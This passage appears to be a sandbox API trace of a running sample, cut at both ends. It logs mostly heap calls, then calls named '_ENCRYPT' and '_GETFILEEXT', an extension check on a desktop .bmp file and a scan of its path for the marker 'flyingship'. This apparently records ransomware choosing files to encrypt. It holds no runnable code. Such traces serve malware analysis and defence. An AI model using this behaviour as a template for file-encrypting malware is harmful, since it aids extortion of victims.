returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.774] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0161.775] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.776] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.777] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0161.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.777] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.778] CloseHandle (hObject=0x138) returned 1 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.778] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.779] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.779] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.779] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.779] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.780] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.780] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0x90add8 [0161.783] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.784] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0x90add8 [0161.784] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.784] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gyeJKtGlaF.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gyeJKtGlaF.bmp\"", cchCount1=10, 